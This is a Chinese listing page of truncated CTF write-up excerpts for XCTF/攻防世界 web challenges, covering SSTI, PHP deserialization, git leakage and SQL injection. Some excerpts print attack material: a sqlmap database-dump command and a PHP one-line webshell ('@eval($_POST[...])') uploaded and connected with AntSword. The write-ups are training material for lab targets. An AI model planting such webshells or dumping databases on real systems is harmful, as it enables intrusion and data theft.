首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
攻防世界web题目解析
2024-09-07
攻防世界Web区部分题解
攻防世界Web区部分题解 前言:PHP序列化就是把代码中所有的 对象 , 类 , 数组 , 变量 , 匿名函数等全部转换为一个字符串 , 提供给用户传输和存储 . 而反序列化就是把字符串重新转换为 对象 , 类 , 数组 , 变量 , 匿名函数 . 通过这种相互转换 ,从而完成 数据持久化. 谈到php的反序列化,就不能不说反序列化中的几种魔术方法,下面是文档中对于魔术方法的说明. 下面看几种重要的魔术方法: __wakeup方法 unserialize()会先检查是否存在一个__wakeu
攻防世界Web新手解析
攻防世界入门的题目 view source 禁用右键,F12审查元素 get post hackbar进行post robots 直接访问robots.txt,发现f1ag_1s_h3re.ph文件,直接访问 backup 备份文件一般是在后缀名后加.swp,.bak 本题尝试index.php.bak成功获取源码 cookie burp抓包,发现提示,查看cookie.php,在响应头发现flag 火狐,F12,网络,cookie可以看到提示,访问之后再看响应头即可 disabled_butt
攻防世界 WEB 高手进阶区 XCTF Web_python_template_injection Writeup
攻防世界 WEB 高手进阶区 XCTF Web_python_template_injection Writeup 题目介绍 题目考点 SSTI模板注入漏洞 Writeup 知识补充 模板注入:模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易.但是模板引擎也拓宽了我们的攻击面.注入到模板中的代码可能会引发RCE或者XSS. 众所周知ssti要被{{}}包括.接下来的代码均要包括在ssti中. 1.几种常用于ssti
攻防世界web进阶题—bug
攻防世界web进阶题-bug 1.打开题目看一下源码,没有问题 2.扫一下目录,没有问题 3.查一下网站的组成:php+Apache+Ubuntu 只有登录界面 这里可以可以想到:爆破.万能密码.进行注册,找回密码逻辑绕过,我在这里用的是找回密码的逻辑绕过(还可以登录后修改密码进行逻辑绕过) 我们先注册账号 然后去找回密码,先输入正确的账号密码,跳转到输入新密码 输入新密码之后确定抓包,将aa改成admin,修改成功 登录admin的账户,发现有一个模块需要特定的ip才可以打开,这里可以想到:i
攻防世界 web进阶练习 NewsCenter
攻防世界 web进阶练习 NewsCenter 题目是NewsCenter,没有提示信息.打开题目,有一处搜索框,搜索新闻.考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有什么变化,考虑SQL注入.随便输入234234234,用burp抓包,发现是post方式,直接用sqlmap爆破.将http头保存为1.txt,试试用sqlmap爆数据库查看news数据库内容sqlmap -r 1.txt -D news --dump得到flag!
XCTF攻防世界Web之WriteUp
XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 robots4 0x04 backup6 0x05 Cookie7 0x06 disabled button8 0x07 simple js9 0x08 XFF Referer10 0x09 weak auth(弱口令密码)12 0x10 web shell15 0x11 command_executio
XCTF攻防世界web进阶练习—mfw
XCTF攻防世界web进阶练习-mfw题目为mfw,没有任何提示.直接打开题目,是一个网站 大概浏览一下其中的内容,看到其中url变化其实只是get的参数的变化查看它的源码,看到有一个?page=flag,flag应该在这个页面里面 但是进入这个页面发现是空的 注意到有这样一个页面,说道用到了Git,想到是否可能和Git源码泄露有关 于是试一下http://111.198.29.45:33750/.git这个url,果然有猫腻 利用.git源码泄漏漏洞,使用githack(下载地址:https:
攻防世界Web刷题记录(新手区)
攻防世界Web刷题记录(新手区) 1.ViewSource 题如其名 Fn + F12 2.get post 3.robots robots.txt是搜索引擎中访问网站的时候要查看的第一个文件.当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围:如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面. 于是扫描根目录: 4.backup 打开: 常见的备份文件后缀名有: .git .s
攻防世界 WEB 高手进阶区 csaw-ctf-2016-quals mfw Writeup
攻防世界 WEB 高手进阶区 csaw-ctf-2016-quals mfw Writeup 题目介绍 题目考点 PHP代码审计 git源码泄露 Writeup 进入题目,点击一番,发现可能出现git源码泄露 url输入 http://220.249.52.134:56659/.git/ 发现果然有git源码泄露 使用 GitHacker 获取源码 看到有flag.php, 尝试打开查看,里面啥也没 打开index.php代码审计 了解assert()函数的使用: 总结一句话就是:assert(
攻防世界 WEB 高手进阶区 TokyoWesterns CTF shrine Writeup
攻防世界 WEB 高手进阶区 TokyoWesterns CTF shrine Writeup 题目介绍 题目考点 模板注入 Writeup 进入题目 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<
攻防世界 WEB 高手进阶区 easytornado Writeup
攻防世界 WEB 高手进阶区 easytornado Writeup 题目介绍 题目考点 Python模板 tornado 模板注入 Writeup 进入题目, 目录遍历得到 /flag.txt /welcome.txt /hints.txt /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) 分析 进入第一个文件 flag.txt,发现好像提示文件名
攻防世界 WEB 高手进阶区 XCTF Web_php_unserialize Writeup
攻防世界 WEB 高手进阶区 XCTF Web_php_unserialize Writeup 题目介绍 题名考点 PHP反序列化漏洞 正则匹配 Writeup <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file,
攻防世界 WEB 高手进阶区 upload1 Writeup
攻防世界 WEB 高手进阶区 upload1 Writeup 题目介绍 题目考点 文件上传漏洞 一句话木马 中国菜刀类工具的使用 Writeup 使用burpsuite抓包 可见只是对上传文件的后缀进行可一个简单判断 准备一句话木马文件, 后缀改为 jpg 格式 <?php @eval($_POST['pass']);?> 使用burpsuite抓包,更改文件后缀为php 使用蚁剑连接 http://220.249.52.134:55798/upload/1610623427.a.php 目录
攻防世界 WEB 高手进阶区 unserialize3 Writeup
攻防世界 WEB 高手进阶区 unserialize3 Writeup 题目介绍 题目考点 PHP反序列化 __wakeup漏洞 Writeup 题名 unserialize 是反序列化函数名 了解一下什么是序列化和反序列化 当在php中创建了一个对象后,可以通过 serialize() 函数把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用.与 serialize() 相反的就是反序列化函数 unserialize() ,它可以将一个字符串转变为相对应的php对象. 在序列化过程中会
攻防世界 WEB 高手进阶区 PHP2 Writeup
攻防世界 WEB 高手进阶区 PHP2 Writeup 题目介绍 题目考点 url 二次解码 index.phps 文件(第一次使用dirsearch可能扫不到,需要加到工具字典里) php 简单语法 Writeup 进入题目 研究一番无果,开始拿 dirsearch 扫描目录 依次尝试访问,最后在访问 index.phps 时发现源码泄露 右键查看源码 分析PHP源码 ,不出意外,那个 key 的内容就是 Flag if("admin"===$_GET[id]) { echo(&qu
攻防世界 WEB 高手进阶区 NSCTF web2 Writeup
攻防世界 WEB 高手进阶区 NSCTF web2 Writeup 题目介绍 题目考点 php基本函数语法 加密解密函数 base64_decode().str_rot13() 字符串反转函数 strrev() 返回字符串一部分函数 substr() Writeup 进入题目直接给出php源码 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($
攻防世界 WEB 高手进阶区 tinyctf-2014 NaNNaNNaNNaN-Batman Writeup
攻防世界 WEB 高手进阶区 tinyctf-2014 NaNNaNNaNNaN-Batman Writeup 题目介绍 题目考点 了解js代码(eval函数.splice函数) 了解正则 Writeup 下载附件打开,如图,目测是 一段js代码 复制的源码: <script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg{e_0iit
攻防世界 WEB 高手进阶区 XCTF 4th-CyberEarth ics-06 Writeup
攻防世界 WEB 高手进阶区 XCTF 4th-CyberEarth ics-06 Writeup 题目介绍 题目考点 掌握暴力破解手段 Writeup 打开链接 http://220.249.52.134:36745 根据提示,直接进报表中心(事实上,一开始没看提示,我都点了一遍,只有报表中心有返回页面,尴尬) 看到 http://220.249.52.134:36745/index.php?id=1 尝试将 id= 任意字符等,试了一波,发现最后都变成了数字 尝试使用 burpsuite 进
攻防世界 WEB 高手进阶区 HCTF 2018 warmup Writeup
攻防世界 WEB 高手进阶区 HCTF 2018 warmup Writeup 题目介绍 题目考点 PHP代码审计 Writeup 打开 http://220.249.52.134:37877 常规操作 F12 看源码 url 输入 http://220.249.52.134:37877/source.php 得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { /
攻防世界web进阶题—unfinish
攻防世界web进阶题-unfinish 1.看一下题目提示SQL 2.打开题目看一下源码,没有问题 3.查一下网站的组成:php+Apache/2.4.7+Ubuntu 4.扫一下目录,扫到一个注册页面--/register.php 注册一个账号登录,登陆后的界面为 没有可利用的地方,返回上一步,注册,既然是SQL注入,那就尝试着绕过 登录后发现用户名为2 猜测此处的SQL语句为insert ........'username' 我们构造的语句执行为 insert......'1'+'1' 既然
热门专题
layui下拉树多选
vue elementui input 禁用
restful 优缺点
centos7如何部署go web
VS编译器 无法启动程序
ios中根据时间戳判断今天昨天前天
core MVC 使用get传值给前台
ubuntu 更改开机logo
lambda set get 方法
django模板内置模板过滤器
rider2018.3.5 破解
app VIP 内购 上架怎么填
css 重新开始 animation
51单片机 p1口 三态
Vulkan 上传纹理
什么方法apriori,算法可以不产生候选项集
asp.net 后台弹出是否对话框
全局安装Cypress 命令启动
android开发 navigation viewmodel
虚拟机配置静态路由与ensp中云通信